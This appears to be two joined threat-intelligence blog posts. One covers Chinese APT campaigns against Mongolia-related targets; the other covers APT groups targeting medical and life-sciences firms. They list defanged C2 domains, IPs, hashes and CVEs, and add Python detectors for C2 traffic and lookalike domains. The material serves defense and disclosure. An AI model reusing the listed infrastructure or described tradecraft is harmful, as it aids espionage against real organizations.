Research on the email address that was identified within the registration of the regionfocus[.]com domain, “yyan_79@hotmail[.]com”, reveals a 2008 academic research paper entitled “Research on P2P File Sharing Anti-pollution Strategy”. The identified research paper was authored by a Chinese female named “Yun Yan” who was born in 1979 and was a doctorate research student in the Department of Electronic and Information Engineering at the Dalian University of Technology in China.


A Nexus to “Comment Crew” aka “APT1”:

As of October 5 2013, ThreatConnect Research identified an additional malware sample (MD5: FD708F4594F24430204C19536801BCD9) that issues the same GET request, “/2011/n325423.shtml”, and calls out to mongolia.regionfocus[.]com.  This file was compiled on October 5 2013 at 07:18 GMT and submitted to VirusTotal at 07:23 GMT (five minutes later), indicating that the adversary may have been testing the malware for antivirus detection. ThreatConnect Research analysis of the binaries and tradecraft employed in the activity described above suggests that “Comment Crew”, aka “APT1”, is likely using this custom implant as well.  The “/2011/n325423.shtml” in the GET request has been previously identified within several APT1 data sets. Retrospective analysis of a known APT1 malware sample, MD5: 5100f0a34695c4c9dc7e915177041cad (as seen in Appendix E), revealed the same GET request for “/2011/n325423.shtml” and legacy C2 nodes that resolved to hardcoded IP address 68.96.31[.]136 (Omaha, Nebraska).


This research identified multiple legacy APT1 domains resolving to 68.96.31[.]136 at various points from September 18th, 2010 until mid February 2013 when the APT1 report was publicly released and the malicious infrastructure was subsequently sinkholed.


The “Safe” Campaign Continues:

ThreatConnect Research analyzed another, separate binary (MD5: 32263b37d8a06595860db2ebdd4ba649) that also exploited CVE-2012-0158 but dropped a different malware implant that communicated with separate C2 infrastructure.  In this case, the decoy document was also written in Mongolian but appears to be unrelated to the two previous examples described above.  When translated, the document references the June 2013 Mongolian presidential election.

Analyst Comment: ThreatConnect Research is not suggesting that the “Comment Crew” activity described above and the “Safe” campaigns are in any way linked or associated.



When executed, the document drops the following files in the C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SafeNet directory:



SafeCredential.DAT also contains the following hardcoded C2 strings, including the C2 domain mongolbaatarsonin[.]in, an RC4 encryption key, and a campaign tag of “0411”:

The malware implant dw20.EXE (MD5: 7E1033C4304DC57DBAAD38D5AEF3D6B3) was designed to communicate over HTTP when executed and included a unique User-Agent string, “Fantasia”. The activity identified within this instance is similar to activity that TrendMicro has dubbed “Safe”, and TrendMicro recognizes this malware as TROJ_DROPER.SMA. In their March 2013 paper, TrendMicro describes a very similar attack using the same implant type but two different sets of C2 servers, one of which included the domains mongolbaatar[.]us and mongolbaatarsonin[.]in. According to TrendMicro, this infrastructure was used to target Mongolian and Tibetan victims. This example demonstrates a continued interest on the part of the “Safe” threat actors in targeting individuals and organizations affiliated with Mongolian issues.
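As an added example that is not ThreatConnect code, the host-side behaviours documented in this post (the hardcoded GET path and C2 domains of the KQ14/APT1 implant, and the “Fantasia” User-Agent of the “Safe” implant) turned into a check over proxy log lines. The tab-separated log layout, client addresses and timestamps are constructed assumptions; the indicators are the ones named in the post.

```python
"""Proxy-log detection for the implant behaviours described in the post.
Added example, not ThreatConnect code. Log lines are constructed (RFC 1918 and
RFC 5737 addresses, made-up timestamps) in a tab-separated layout:
timestamp, client, method, url, user-agent."""
from urllib.parse import urlsplit


def refang(indicator):
    """'a.b[.]net' -> 'a.b.net' so defanged feed entries compare with live logs."""
    return indicator.replace("[.]", ".")


# Indicators from the post, stored refanged and lower-cased for comparison.
C2_DOMAINS = {refang(d) for d in (
    "peaceful.linkpc[.]net", "mongolia.regionfocus[.]com",
    "mseupdate.strangled[.]net", "mongolbaatarsonin[.]in", "mongolbaatar[.]us")}
C2_PATHS = {"/2011/n325423.shtml"}   # hardcoded in the KQ14 implant and APT1 samples
C2_USER_AGENTS = {"fantasia"}         # 'Safe' implant dw20.EXE, matched case-insensitively

# Constructed proxy log; the last line is deliberately malformed.
LOG = """\
2013-10-05T07:25:01Z\t10.0.0.12\tGET\thttp://mongolia.regionfocus.com/2011/n325423.shtml\tMozilla/4.0 (compatible; MSIE 6.0)
2013-10-05T07:26:40Z\t10.0.0.12\tGET\thttp://www.example.com/index.html\tMozilla/5.0
2013-10-05T07:30:12Z\t10.0.0.33\tPOST\thttp://203.0.113.7/record\tFantasia
2013-10-05T07:31:00Z\t10.0.0.40\tGET\thttp://cdn.example.net/2011/n325423.shtml\tMozilla/5.0
2013-10-05T07:32:10Z\t10.0.0.41\tGET\thttp://PEACEFUL.LINKPC.NET/\tMozilla/4.0
malformed line that should be skipped
"""


def parse_line(line):
    """Split one log line into a dict, or return None if it is not well-formed."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 5:
        return None
    ts, client, method, url, ua = parts
    u = urlsplit(url)
    return {"ts": ts, "client": client, "method": method,
            "host": (u.hostname or "").lower(), "path": u.path or "/", "ua": ua}


def match(event):
    """Return the list of indicator matches for one event; empty means no hit.
    A path-only hit (no C2 host) is still reported: the path is specific enough
    to triage, but it is weaker evidence than a host or User-Agent match."""
    reasons = []
    if event["host"] in C2_DOMAINS:
        reasons.append("c2-domain:" + event["host"])
    if event["path"] in C2_PATHS:
        reasons.append("c2-path:" + event["path"])
    if event["ua"].lower() in C2_USER_AGENTS:
        reasons.append("c2-user-agent:" + event["ua"])
    return reasons


def scan(log_text):
    """Return (timestamp, client, reasons) for every matching line in the log."""
    hits = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        reasons = match(event)
        if reasons:
            hits.append((event["ts"], event["client"], reasons))
    return hits


if __name__ == "__main__":
    for hit in scan(LOG):
        print(hit)
```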

Likely Attacker Motives:

US Military Support for Mongolia

Khaan Quest is an annual exercise hosted by the Mongolian Armed Forces with co-sponsorship alternating between the US Marine Corps Forces, Pacific and US Army Pacific. Approximately 1,000 troops from Mongolia, United States, Australia, Canada, France, Germany, Japan, India, Nepal, Republic of Korea, Tajikistan, United Kingdom and Vietnam took part in the exercise between 3 and 14 August 2013.  This is a prime example of the Mongolian military benefiting from US military cooperation and support.  The US has afforded Mongolian officers, citizens, and Foreign Service personnel the opportunity to attend military academic and training institutions across the US; engage in multiple training programs alongside US military personnel; and be given large amounts of technical support and upgrades.  In the past, Mongolia’s military has been developed and maintained largely by either Soviet Russia or China. Mongolia does not wish to repeat this scenario for fear of over-reliance on its powerful neighbors, and their possible political and military coercion, so it looks to the US for support in developing Mongolia’s military. As Mongolia does not share a border with the US, and has no history of US interference, it can comfortably develop a bilateral alliance with the US. The Chinese government regards the US as “a potential foe” which is threatening to deploy an encirclement strategy connecting from Central Asia to Mongolia.  Exercises such as Khaan Quest embody China’s perceived US encroachment in the region.  Beijing cannot afford to overlook the importance of developing relations with Mongolia to counter what they perceive as a US encirclement strategy.

Mongolian Foreign Relations

Mongolia became the 57th nation to join the Organization for Security and Co-operation in Europe (OSCE) on 21 November 2012. The OSCE Office for Democratic Institutions and Human Rights (ODIHR) also monitored the 26 June presidential election in Mongolia. ODIHR was invited by the government of Mongolia to observe the presidential election, in line with the country’s commitments as an OSCE participating State. In spite of the vast borders it shares with Russia and China, Mongolia is attempting to steer a more independent path by reaching out to what it calls “third neighbors,” such as the United States, Japan, South Korea, and the European Union, in order to preserve its independence. Mongolia hopes that engagements such as joining OSCE will alter the dynamics of the region, so that it will move from being bound by Russia-China geopolitics to becoming a fully independent member of the region and international society. A strategic pivot westward by Mongolia only diminishes Chinese influence.

Investment in Mongolia by China

Lying beneath Mongolia’s storied lands is an estimated $1.3 trillion in mineral resources such as coal, iron ore and copper. In 2011, China was a consumer of nearly 8 million metric tons of copper, accounting for 40% of the world’s total. By 2014, it is expected that China will consume nearly 84% of the world’s copper. A burgeoning natural resource and mining sector is expected to make Mongolia’s the second fastest growing economy worldwide in 2013, building upon over a decade of rapid economic expansion. The Oyu Tolgoi mine, a combined open pit and underground mining project in Mongolia, is the largest financial undertaking in Mongolia’s history and is expected to reach 500,000 tons of copper output annually. The Oyu Tolgoi mine is being developed as a joint venture between companies Turquoise Hill Resources, Rio Tinto and the Government of Mongolia. China imported 7% of its copper from Mongolia in 2012, when Oyu Tolgoi was just starting up. By having a mine like that on their doorstep, it would decrease China’s reliance on copper from Latin America, particularly Chile, where China gets over 74% of its copper. Beginning in the 1990s, China has become Mongolia’s biggest trading partner, and numerous Chinese businesses are operating there. China has been the largest investor in Mongolia since 1998 and its largest trading partner since 1999. In 2009, the bilateral trade figure stood at $2.4 billion with China importing $1.3 billion worth of commodities, which accounted for more than 70 per cent of Mongolian exports. According to official Mongolian statistics, China invested a total of $2.3 billion dollars in 2009, more than 60 percent of the total foreign investment in Mongolia.


This activity represents Chinese Computer Network Exploitation (CNE) activity against organizations that China perceives to be jeopardizing its interests in Mongolia. As evidenced in the weaponized Khaan Quest document described above, Chinese APT groups will likely continue targeting US military entities involved in cooperation activities with the Mongolian military. Western European and other governments that engage with Mongolia diplomatically will be considered CNE targets as well. China’s heavy economic investment in Mongolian natural resources will likely continue to fuel cyber espionage efforts against commercial entities, particularly mining and energy exploration companies that may compete with Chinese mining and energy companies in Mongolia. Details associated with this threat have been shared system-wide within all ThreatConnect Communities as Incident “20130910A: KQ14 – CDC Document Exploit”. If your organization is interested in obtaining regular crowd-sourced threat intelligence that increases your awareness of existing or emerging threats, please register at ThreatConnect, join our communities, and connect and collaborate.

Network Health: Advanced Cyber Threats to the Medical & Life Sciences Industries

In a 2011 report to Congress on Foreign Economic Collection and Industrial Espionage released by the Office of the National Counterintelligence Executive, the authors stated that “Healthcare services and medical devices/equipment will be two of the five fastest growing international investment sectors according to a US consulting firm. The massive research and development (R&D) costs for new products in these sectors, up to $1 billion for a single drug, the possibility of earning monopoly profits from a popular new pharmaceutical, and the growing need for medical care by aging populations in China, Russia, and elsewhere are likely to drive interest in collecting valuable US healthcare, pharmaceutical, and related information.”

Cyber Squared is actively tracking sophisticated cyber threats, some of which are targeting the medical and life sciences industries. In recent years, cyber threat groups have increasingly demonstrated a growing interest in these industries.  Due to this identified trend, Cyber Squared has developed a case study that examines targeted attacks and describes the motives behind the victimization of the medical industry by these specific threat groups.

Because attacks within the medical industry rarely make headlines, one may not be aware of its appeal to attackers, but there are several reasons why it is a prime target. Those within the medical industry who research, develop, or sell products, or provide services to consumers, need to understand why they are being targeted, that they face an increasing risk, and how they can better protect their assets. The following examples identify specific APT threat groups that are targeting medical and health related organizations today.

APT Example 1:

In October of 2012, a Chinese threat actor staged the domains geneoptix[.]com, bioduroinc[.]com, and accsenture[.]com to host a malicious Internet Explorer (IE) zero-day exploit (CVE-2012-4969).  Links to these malicious websites were most likely used within targeted spearphishing campaigns and/or within targeted drive-by download attacks.  The staged domain names resembled the domains of the legitimate companies GenOptix, BioDuro and Accenture, all of whom provide advanced medical, drug, and life sciences research. The identified malicious infrastructure co-existed at overlapping points in time, which indicates that there were likely multiple concurrent targeting campaigns occurring.

Cyber Squared was able to confirm that the attackers mirrored the legitimate BioDuro website with a drive-by attack site that used a malicious iframe redirecting users to a CVE-2012-4969 IE zero-day exploit.  BioDuro is a Drug Discovery and Life Science Research company located in Beijing.  Upon compromise, the victims were subsequently infected with a downloader variant of the Destroy Remote Access Trojan (RAT) known as Win32/Thoper.B aka Sogu aka TVT.

The attackers would have had the ability to leverage the malicious infrastructure to directly target a variety of individuals such as personnel within the legitimate companies, their parent companies, partners, affiliates and competitors. Any individual within a target organization who would have recognized and trusted the BioDuro brand would have been an ideal target.  Persistent access to cutting edge research or competitive information could have allowed the attackers to leverage their remote accesses to provide an advantage to the benefactors of any compromised data.
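The staged lookalike domains in APT Example 1, as an added defensive check that is not Cyber Squared or ThreatConnect code: it flags a candidate domain whose registrable label contains a watched brand name or sits within a small edit distance of one. The brand watchlist and the candidates are constructed from the names in the post plus a neutral control domain.

```python
"""Lookalike-domain check for staged domains such as geneoptix[.]com,
bioduroinc[.]com and accsenture[.]com. Added example, not Cyber Squared or
ThreatConnect code; the watchlist is constructed from brands named in the post."""


def edit_distance(a, b):
    """Damerau-Levenshtein (optimal string alignment) distance: insertions,
    deletions, substitutions and adjacent transpositions each cost 1."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            d = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                d = min(d, prev2[j - 2] + 1)  # transposition of adjacent chars
            cur.append(d)
        prev2, prev = prev, cur
    return prev[-1]


def registrable_label(domain):
    """Second-level label of a plain or defanged domain. No public-suffix list:
    'www.' and one suffix label are stripped, enough for .com/.net/.org names."""
    labels = domain.lower().replace("[.]", ".").strip(".").split(".")
    if labels and labels[0] == "www":
        labels = labels[1:]
    return labels[-2] if len(labels) >= 2 else labels[0]


# Legitimate brand names from the post (constructed watchlist).
BRANDS = ["genoptix", "bioduro", "accenture"]


def classify(domain, brands=BRANDS, max_distance=2):
    """Return (brand, reason) if `domain` looks like an impersonation of a
    watched brand, or None for the brand's own domain and unrelated names.
    Substring matching is skipped for very short brands to limit false hits."""
    label = registrable_label(domain)
    if label in brands:
        return None  # the legitimate domain itself
    for brand in brands:
        if len(brand) >= 5 and brand in label:
            return (brand, "contains-brand")
        distance = edit_distance(label, brand)
        if distance <= max_distance:
            return (brand, f"edit-distance-{distance}")
    return None


if __name__ == "__main__":
    for candidate in ("geneoptix[.]com", "bioduroinc[.]com", "accsenture[.]com",
                      "www.genoptix.com", "example.com"):
        print(candidate, "->", classify(candidate))
```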

APT Example 2:

On July 2, 2012, AlienVault Labs published a blog about a family of malware called Sykipot, which was a follow-up from a January 12th blog.  The Sykipot implant (also known as GetKys) has been used in targeted attacks for at least the past couple of years, and unconfirmed traces date back to as early as 2006. While the AlienVault Labs blog identified nine domains that were registered by Sykipot actors, Cyber Squared analysts used ThreatConnect to apply additional enrichments to the AlienVault data, and were able to grow the data set to more than thirty additional command and control (C2) domains and three email addresses used to register the C2 domains. After analyzing the infrastructure used by the perpetrators of Sykipot, Cyber Squared has confidently determined that these adversaries are targeting the medical industry. Here is a sample of the results of our analysis:

  • One of the thirty domains registered by the Sykipot actor(s) is “nihnrhealth[.]com”, which could be easily mistaken by a Sykipot victim as a legitimate domain associated with the National Health Information Network.
  • Another Sykipot command and control domain (server.hostdefense[.]net) resolved to the IP address of a host registered by the Asian Pacific AIDS Intervention Team (APAIT). The APAIT is an organization that positively affects the quality of life for Asian and Pacific Islanders living with or at risk for HIV/AIDS by providing a continuum of prevention, health and social services, community leadership and advocacy to the Southern California region. APAIT is one of the nation’s largest providers of HIV/AIDS prevention and care services for the Asian and Pacific Islander (API) communities. Based in Southern California, APAIT has been providing culturally and linguistically appropriate services to APIs since 1987. (Commerce, 2009) It is likely that APAIT networks were a previous target of threat actors, and are being repurposed in subsequent attacks. (Parkour, 2010)
  • Cyber Squared used ThreatConnect to analyze Sykipot domain “e-landusa[.]net”, and identified more than twenty other command and control domains had resolved to IP address 24.236.34[.]140.  One of the domains identified was “altchksrv.hostdefence[.]net”. AlienVault previously implicated Sykipot actors using “altchksrv.hostdefence[.]net” in attacks that utilized Adobe vulnerability CVE-2011-2462 in December 2011.
  • “Hostdefence[.]net” was registered by the email address “parviz7415 [at]”, and has another subdomain, “server.hostdefence[.]net”. Both “server.hostdefence[.]net” and “altchksrv.hostdefence[.]net” resolved to 216.2.95[.]195 (the APAIT IP address) for nearly 12 months.
  • A malware sample submitted to ThreatExpert in January 2012 was labeled Sykipot by Kaspersky antivirus signatures, and attempts connections to 216.2.95[.]195.  Victims were exploited to deliver malicious software that enabled a command and control relationship between their compromised systems and the Sykipot actor’s infrastructure.  Domains were tailored to the medical community, and medical systems were used as midpoint hops, making them unwilling participants in the exploitation effort.
  • While not connected to Sykipot, between December 8, 2011 and January 18, 2012, four other malware samples were submitted to ThreatExpert that had APAIT IP address 216.2.95[.]195 embedded as a command and control destination. All were assessed to be of Chinese origin.
  • Further research shows a 2010 targeted email attack using an APAIT Internet Protocol address to send a malicious spearphishing message.

APT Example 3:

Between June and July of 2012, a group of Chinese threat actors (also known as “VOHO”) employed a drive-by download campaign to mass compromise their victims.  The targets appeared to be specifically chosen to compromise victims involved in business and local governments in Washington, D.C. and Boston, Massachusetts, as well as organizations involved in the development and promotion of the democratic process in non-permissive regions.  The attackers used the Gh0st RAT to interact with their victims.  According to a report by RSA, the attackers compromised a legitimate Taiwanese medical web site, “www.wsdhealty[.]com”, to host malicious software that exploited Java and Microsoft vulnerabilities CVE-2012-1723 and CVE-2012-1889.  Cyber Squared was able to identify that the attackers also staged the domain “nih-gov.darktech[.]org” within associated malicious command and control infrastructure also used within the initial VOHO campaign.  This likely indicates an infrastructure management technique on the part of the VOHO actors in targeting the National Institutes of Health (NIH) as part of the VOHO campaign.


The threats posed by resourced and sophisticated threat groups targeting the medical and life sciences industry are very real.  The application of economic espionage within these industries ultimately leaves multi-billion dollar lifesaving research and medical breakthroughs in the crosshairs.  Organizations that invest their time and resources specializing in advanced life sciences and research must begin to address the risks posed by sophisticated threats in an effort to minimize intellectual property loss and disruptions to business operations. Those who are unwilling to address the risk posed by persistent cyber threats could face the loss of intellectual property, market share, revenues and much more.

All of the APT examples highlighted above have been compiled and publicly shared under Incident “20130313A: Medical Threats Blog” within the ThreatConnect community.  If you represent a medical research or life sciences organization and wish to obtain regular threat intelligence updates within a secure community sharing exchange, please register at for an organizational account. The Medical Case Study, “Medical Industry, A Cyber Victim: Billions Stolen and Lives At Risk”, is available on the Cyber Squared downloads page.